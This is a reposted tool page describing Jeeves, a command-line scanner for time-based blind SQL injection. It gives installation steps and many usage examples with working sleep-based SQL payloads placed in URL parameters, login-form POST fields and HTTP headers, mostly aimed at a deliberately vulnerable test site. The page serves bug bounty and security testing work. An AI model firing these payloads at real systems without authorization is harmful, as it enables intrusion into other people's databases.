Jeeves - Time-Based Blind SQLInjection Finder
2022-6-11 05:30:0 Author: www.kitploit.com(查看原文) 阅读量:55 收藏

Jeeves is made for looking to Time-Based Blind SQLInjection through recon.

- Installation & Requirements:

Installing Jeeves

OR

$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Usage & Explanation:

In Your recon process, you may find endpoints that can be vulnerable to sql injection, Ex: https://redacted.com/index.php?id=1

Single urls

echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

In --payload-time you must use the time mentioned in payload


From list

cat targets | jeeves --payload-time 5

Adding Headers

Pay attention to the syntax! Must be the same =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Using proxy

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Headers =>

echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Post Request

Sending data through post request ( login forms, etc )

Pay attention to the syntax! Must be equal! ->

echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Another ways of Usage

You are able to use of Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strenght

Command line flags:

traffic to a proxy -c Set Concurrency, Default 25 -H, --headers Custom Headers -d, --data Sending Post request with data -h Show This Help Message">

 Usage:
-t, --payload-time, The time from payload
-p, --proxy Send traffic to a proxy
-c Set Concurrency, Default 25
-H, --headers Custom Headers
-d, --data Sending Post request with data
-h Show This Help Message

Using with sql payloads wordlist

cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Testing in headers

echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

OBS:

  • Does not follow redirects, If the Status Code is diferent than 200, it returns "Need Manual Analisys"
  • Jeeves does not http probing, he is not able to do requests to urls that does not contain protocol ( http://, https:// )

This project is for educational and bug bounty porposes only! I do not support any illegal activities!.

If any error in the program, talk to me immediatly.

Please, also check these =>

Nilo - Checks if URL has status 200

SQLMAP

Blisqy Header time based SQLI

Jeeves - Time-Based Blind SQLInjection Finder Jeeves - Time-Based Blind SQLInjection Finder Reviewed by Zion3R on 5:30 PM Rating: 5


文章来源: http://www.kitploit.com/2022/06/jeeves-time-based-blind-sqlinjection.html
如有侵权请联系:admin#unsafe.sh